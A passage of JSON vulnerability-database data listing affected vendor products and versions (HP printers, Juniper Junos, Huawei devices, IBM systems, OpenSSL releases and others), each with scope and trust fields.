        "model": "data ontap",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "7.2.4"
      },
      {
        "model": "family",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "125000"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "13.2"
      },
      {
        "model": "8.4-beta1",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.55"
      },
      {
        "model": "officejet enterprise color c2s11a 2302963 436074",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "x555"
      },
      {
        "model": "web appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "symantec",
        "version": "3.9.0.0"
      },
      {
        "model": "tsm v100r002",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "project openssl f",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.3.12"
      },
      {
        "model": "msr30-16 family",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "imc ead",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.00"
      },
      {
        "model": "rational tau",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.31"
      },
      {
        "model": "laserjet m5035 multifunction printer q7829a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "fortios b064",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.0"
      },
      {
        "model": "open source security information management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "alienvault",
        "version": "2.1.5-1"
      },
      {
        "model": "mysql",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.6.12"
      },
      {
        "model": "mysql",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.6.20"
      },
      {
        "model": "laserjet p4015 cb509a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "4.213.1"
      },
      {
        "model": "usg9500 v300r001c20sph102",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "system m4 type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "x353071600"
      },
      {
        "model": "initiate master data service patient hub",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.5"
      },
      {
        "model": "storevirtual fc 900gb sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433011.5"
      },
      {
        "model": "laserjet m3035 multifunction printer cb414a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "48.306.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.25"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "11.4x27.43"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2"
      },
      {
        "model": "websphere cast iron cloud integration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.13"
      },
      {
        "model": "asa cx context-aware security",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "color laserjet cp5525 ce709a 2302963 436070",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "horizon workspace client for windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "1.5"
      },
      {
        "model": "web filter",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "websense",
        "version": "7.7"
      },
      {
        "model": "project openssl 1.0.1d",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.52"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.5"
      },
      {
        "model": "unified im and presence services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.3"
      },
      {
        "model": "junos 11.4r7-s1",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "junos d10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "12.1x47"
      },
      {
        "model": "security network intrusion prevention system gv200",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "laserjet enterprise color mfp m880 a2w75a 2302963 436068",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "800"
      },
      {
        "model": "elog v100r003c01spc503",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "rational reporting for development intelligence",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.0.3"
      },
      {
        "model": "system storage ts3400 tape library",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0040"
      },
      {
        "model": "telepresence server on multiparty media",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3100"
      },
      {
        "model": "cit",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "9.40"
      },
      {
        "model": "system m4 type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "x357087520"
      },
      {
        "model": "flex system fabric en4093r 10gb scalable switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.8.4.0"
      },
      {
        "model": "s5900 v100r005",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "scanjet enterprise document capture workstation l2719a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "85000"
      },
      {
        "model": "fortiweb",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.2.0"
      },
      {
        "model": "s6900 v100r005",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "web security gateway anywhere",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "websense",
        "version": "7.7.3"
      },
      {
        "model": "storevirtual hybrid storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433512.5"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "7.1"
      },
      {
        "model": "scale out network attached storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.1"
      },
      {
        "model": "storevirtual 3tb mdl sas storage/s-buy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "453012.6"
      },
      {
        "model": "storevirtual fc 900gb china sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433012.5"
      },
      {
        "model": "proactive contact",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "junos 12.1r11",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "ip office application server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "8.1"
      },
      {
        "model": "fusionsphere v100r003",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "splunk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "splunk",
        "version": "5.0.5"
      },
      {
        "model": "websphere datapower soa appliance",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.015"
      },
      {
        "model": "tsm v100r002c07spc219",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "vma san gateway g5.5.1.3",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "network connect",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "6.4.0.14619"
      },
      {
        "model": "one-x mobile lite for android",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.173"
      },
      {
        "model": "smartcloud provisioning",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.3"
      },
      {
        "model": "system dx360m3 type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "63911.42"
      },
      {
        "model": "espace iad v300r002c01",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "sterling connect:direct",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.6"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.4"
      },
      {
        "model": "documentum content server sp1 p28",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "emc",
        "version": "6.7"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.24"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.2"
      },
      {
        "model": "prime collaboration provisioning",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.5"
      },
      {
        "model": "real-time compression appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.8"
      },
      {
        "model": "security network intrusion prevention system gx7412-10",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "fortianalyzer",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.0.7"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.45"
      },
      {
        "model": "arubaos",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "arubanetworks",
        "version": "6.4.1.0"
      },
      {
        "model": "cognos express",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.5"
      },
      {
        "model": "-release-p5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "8.0"
      },
      {
        "model": "color laserjet cp6015 q3931a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "53.236.1"
      },
      {
        "model": "9.2-rc3-p1",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.7.5"
      },
      {
        "model": "aura communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.0.1"
      },
      {
        "model": "laserjet p3005 printer series q7815a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.190.3"
      },
      {
        "model": "datafort fc-series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "0"
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2.1.0.9"
      },
      {
        "model": "vcac",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.0.1"
      },
      {
        "model": "vcenter site recovery manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.5.1"
      },
      {
        "model": "power express",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7200"
      },
      {
        "model": "unified communications manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "laserjet printer series q5408a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "43508.250.2"
      },
      {
        "model": "s2750\u0026s5700\u0026s6700 v200r003",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "xiv storage system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "281011.3"
      },
      {
        "model": "storevirtual 600gb sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "473012.0"
      },
      {
        "model": "4210g switch series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "aura application server sip core",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "53003.0"
      },
      {
        "model": "aura application server sip core pb25",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "53002.0"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.1.4"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.3.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.8"
      },
      {
        "model": "junos r1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "14.1"
      },
      {
        "model": "laserjet enterprise m603 series ce995a 2302963 436082",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "600"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.118"
      },
      {
        "model": "unified series ip phones",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "79000"
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.88"
      },
      {
        "model": "vdi-in-a-box",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.4.3"
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.95"
      },
      {
        "model": "tivoli netcool/system service monitor fp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.0"
      },
      {
        "model": "aura experience portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0.1"
      },
      {
        "model": "aura experience portal sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "hyperdp v200r001c09spc501",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "aura messaging",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "ei switch series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "55000"
      },
      {
        "model": "nsx for multi-hypervisor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.0.3"
      },
      {
        "model": "toolscenter suite",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.52"
      },
      {
        "model": "system m4 type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "x355079140"
      },
      {
        "model": "integrated lights out manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "3.2.3"
      },
      {
        "model": "utm",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "sophos",
        "version": "9.203"
      },
      {
        "model": "data ontap",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "7.3.1.1"
      },
      {
        "model": "storevirtual 600gb sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "453011.5"
      },
      {
        "model": "telepresence",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "13100"
      },
      {
        "model": "project openssl 1.0.1b",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "project openssl 1.0.0k",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "laserjet enterprise mfp m725 cf069a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "aura system platform sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "sylpheed",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sylpheed",
        "version": "0.9.10"
      },
      {
        "model": "laserjet printer series q7784a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "42408.250.2"
      },
      {
        "model": "switch series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "59000"
      },
      {
        "model": "project metasploit framework",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "metasploit",
        "version": "4.9.3"
      },
      {
        "model": "scale out network attached storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.4.3.0"
      },
      {
        "model": "usg2000 v300r001c10spc200",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.86"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "3.1.12"
      },
      {
        "model": "vdi-in-a-box",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.3.3"
      },
      {
        "model": "aura conferencing",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "7.0"
      },
      {
        "model": "project metasploit framework",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "metasploit",
        "version": "4.9.2"
      },
      {
        "model": "cloudsystem enterprise software",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "8.1"
      },
      {
        "model": "storevirtual 600gb china sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "413012.5"
      },
      {
        "model": "switch series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "75000"
      },
      {
        "model": "one-x communicator for microsoft windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.1"
      },
      {
        "model": "aura system platform sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "watson explorer security",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.2"
      },
      {
        "model": "centos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "centos",
        "version": "6"
      },
      {
        "model": "junos r12",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "11.4"
      },
      {
        "model": "websphere datapower low latency appliance xm70",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.0.0"
      },
      {
        "model": "fortiweb",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.1.4"
      },
      {
        "model": "9.0-release",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "epolicy orchestrator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "4.6.7"
      },
      {
        "model": "storevirtual 900gb sas storage/s-buy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "473012.0"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2.1"
      },
      {
        "model": "aura communication manager utility services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "laserjet enterprise mfp m725 cf068a 2302963 436078",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.59"
      },
      {
        "model": "laserjet enterprise mfp m725 cf068a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "smart analytics system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10500"
      },
      {
        "model": "flare experience for microsoft windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "1.1.3"
      },
      {
        "model": "laserjet enterprise color mfp m575dn cd644a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5000"
      },
      {
        "model": "linux",
        "scope": null,
        "trust": 0.3,
        "vendor": "gentoo",
        "version": null
      },
      {
        "model": "junos os 14.1r1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "snapdrive for windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1"
      },
      {
        "model": "8.4-release-p7",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "operations analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.1"
      },
      {
        "model": "color laserjet cp3505 printer series cb442a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "3.160.2"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.2"
      },
      {
        "model": "clustered data ontap antivirus connector",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.1"
      },
      {
        "model": "rational tau",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.32"
      },
      {
        "model": "junos space",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "12.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.42"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5"
      },
      {
        "model": "aura utility services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "e-business suite 11i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "11.5.10.2"
      },
      {
        "model": "open source security information management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "alienvault",
        "version": "4.6"
      },
      {
        "model": "laserjet printer series q5400a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "42508.250.2"
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1"
      },
      {
        "model": "splunk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "splunk",
        "version": "6.0.1"
      },
      {
        "model": "system m4 type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "x357087220"
      },
      {
        "model": "blackberry enterprise service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "rim",
        "version": "10.2.0"
      },
      {
        "model": "netscaler",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "9.3"
      },
      {
        "model": "laserjet printer series q7546a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "52008.241"
      },
      {
        "model": "command view for tape libraries",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "3.8"
      },
      {
        "model": "big-iq security",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.1"
      },
      {
        "model": "unified contact center express",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "aura communication manager utility services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3"
      },
      {
        "model": "laserjet printer series q7547a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "52008.241"
      },
      {
        "model": "svn5500 v200r001c01hp0001",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "project openssl beta2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0.1"
      },
      {
        "model": "websphere datapower xml security gateway xs40",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.01"
      },
      {
        "model": "rox",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "22.6"
      },
      {
        "model": "ip office application server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "9.0"
      },
      {
        "model": "power ps701",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "color laserjet m651 cz256a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "websphere datapower xml security gateway xs40",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.012"
      },
      {
        "model": "agent desktop for cisco unified contact center enterprise",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "splunk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "splunk",
        "version": "5.0.8"
      },
      {
        "model": "vdi communicator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "1.0.3"
      },
      {
        "model": "oceanstor s5500t v100r002",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "laserjet enterprise mfp m725 cf066a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "proxysgos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "6.1"
      },
      {
        "model": "laserjet enterprise mfp m630 series b3g85a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "one-x communicator for mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "x1.0.1"
      },
      {
        "model": "aura messaging sp4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "telepresence profile series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "splunk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "splunk",
        "version": "5.0.3"
      },
      {
        "model": "espace iad v300r001c07",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "software foundation python",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "python",
        "version": "3.4"
      },
      {
        "model": "storevirtual 900gb sas storage/s-buy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433011.5"
      },
      {
        "model": "laserjet enterprise color m775 series cf304a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7000"
      },
      {
        "model": "9.2-rc1-p2",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "storevirtual 600gb sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "413012.5"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.119"
      },
      {
        "model": "junos space",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "11.2"
      },
      {
        "model": "iq",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "laserjet printer series q5402a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "42508.250.2"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.7"
      },
      {
        "model": "msr30-1x family",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "vcloud networking and security",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.5.2"
      },
      {
        "model": "color laserjet printer series q7491a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "470046.230.6"
      },
      {
        "model": "4510g switch series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "4.0.6"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.3.5"
      },
      {
        "model": "laserjet m3035 multifunction printer cb414a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "dsr-1000 rev. a1",
        "scope": null,
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "operations automation",
